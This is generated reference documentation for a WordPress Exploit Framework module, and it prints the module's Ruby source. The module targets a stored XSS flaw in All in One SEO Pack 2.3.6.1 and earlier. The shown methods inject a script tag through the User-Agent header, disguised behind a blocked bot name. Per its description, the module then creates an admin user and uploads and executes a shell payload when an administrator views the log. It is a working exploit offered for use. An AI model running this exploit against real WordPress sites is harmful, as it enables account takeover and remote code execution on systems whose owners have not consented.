Class: Wpxf::Exploit::AllInOneSeoPackXssShellUpload
- Includes:
- WordPress::Xss
- Defined in:
- lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #blocked_bots ⇒ Object
- #check ⇒ Object
-
#initialize ⇒ AllInOneSeoPackXssShellUpload
constructor
A new instance of AllInOneSeoPackXssShellUpload.
- #run ⇒ Object
- #store_script ⇒ Object
Methods included from WordPress::Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ AllInOneSeoPackXssShellUpload
Returns a new instance of AllInOneSeoPackXssShellUpload.
6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 6 def initialize super update_info( name: 'All in One SEO Pack <= 2.3.6.1 Stored XSS Shell Upload', desc: %( This module exploits a lack of HTTP header sanitization in versions <= 2.3.6.1 of the All in One SEO Pack plugin which allows unauthenticated users to store a script that will create a new admin user and use the new credentials to upload and execute a payload when an admin views the blocked bot logs. ).strip, author: [ 'David Vaartjes', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8538'], ['URL', 'https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html'] ], date: 'Jul 10 2016' ) end |
Instance Method Details
#blocked_bots ⇒ Object
34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 |
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 34 def blocked_bots [ 'Abonti', 'aggregator', 'AhrefsBot', 'asterias', 'BDCbot', 'BLEXBot', 'BuiltBotTough', 'Bullseye', 'BunnySlippers', 'ca-crawler', 'CCBot', 'Cegbfeieh', 'CheeseBot', 'CherryPicker', 'CopyRightCheck', 'cosmos', 'Crescent', 'discobot', 'DittoSpyder', 'DotBot', 'Download Ninja', 'EasouSpider', 'EmailCollector', 'EmailSiphon', 'EmailWolf', 'EroCrawler', 'Exabot', 'ExtractorPro', 'Fasterfox', 'FeedBooster', 'Foobot', 'Genieo', 'grub-client', 'Harvest', 'hloader', 'httplib', 'HTTrack', 'humanlinks', 'ieautodiscovery', 'InfoNaviRobot', 'IstellaBot', 'Java/1.', 'JennyBot', 'k2spider', 'Kenjin Spider', 'Keyword Density/0.9', 'larbin', 'LexiBot', 'libWeb', 'libwww', 'LinkextractorPro', 'linko', 'LinkScan/8.1a Unix', 'LinkWalker', 'LNSpiderguy', 'lwp-trivial', 'magpie', 'Mata Hari', 'MaxPointCrawler', 'MegaIndex', 'Microsoft URL Control', 'MIIxpc', 'Mippin', 'Missigua Locator', 'Mister PiX', 'MJ12bot', 'moget', 'MSIECrawler', 'NetAnts', 'NICErsPRO', 'Niki-Bot', 'NPBot', 'Nutch', 'Offline Explorer', 'Openfind', 'panscient.com', 'PHP/5.{', 'ProPowerBot/2.14', 'ProWebWalker', 'Python-urllib', 'QueryN Metasearch', 'RepoMonkey', 'RMA', 'SemrushBot', 'SeznamBot', 'SISTRIX', 'sitecheck.Internetseer.com', 'SiteSnagger', 'SnapPreviewBot', 'Sogou', 'SpankBot', 'spanner', 'spbot', 'Spinn3r', 'suzuran', 'Szukacz/1.4', 'Teleport', 'Telesoft', 'The Intraformant', 'TheNomad', 'TightTwatBot', 'Titan', 'toCrawl/UrlDispatcher', 'True_Robot', 'turingos', 'TurnitinBot', 'UbiCrawler', 'UnisterBot', 'URLy Warning', 'VCI', 'WBSearchBot', 'Web Downloader/6.9', 'Web Image Collector', 'WebAuto', 'WebBandit', 'WebCopier', 'WebEnhancer', 'WebmasterWorldForumBot', 'WebReaper', 'WebSauger', 'Website Quester', 'Webster Pro', 'WebStripper', 'WebZip', 'Wotbox', 'wsr-agent', 'WWW-Collector-E', 'Xenu', 'Zao', 'Zeus', 'ZyBORG', 'coccoc', 'Incutio', 'lmspider', 'memoryBot', 'SemrushBot', 'serf', 'Unknown', 'uptime files' ] end |
#check ⇒ Object
30 31 32 |
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 30 def check check_plugin_version_from_readme('all-in-one-seo-pack', '2.3.6.2') end |
#run ⇒ Object
199 200 201 202 203 204 205 206 207 |
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 199 def run return false unless super return false unless store_script emit_success 'Script stored and will be executed when a user views the blocked bots log' start_http_server xss_shell_success end |
#store_script ⇒ Object
178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 |
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 178 def store_script emit_info 'Storing script...' res = execute_get_request( url: full_uri, headers: { 'User-Agent' => "#{blocked_bots.sample}<script>#{xss_ascii_encoded_include_script}</script>" } ) if res.nil? emit_error 'No response from the target' return false end if res.code != 503 emit_warning "Server responded with code #{res.code}, expected 503" end true end |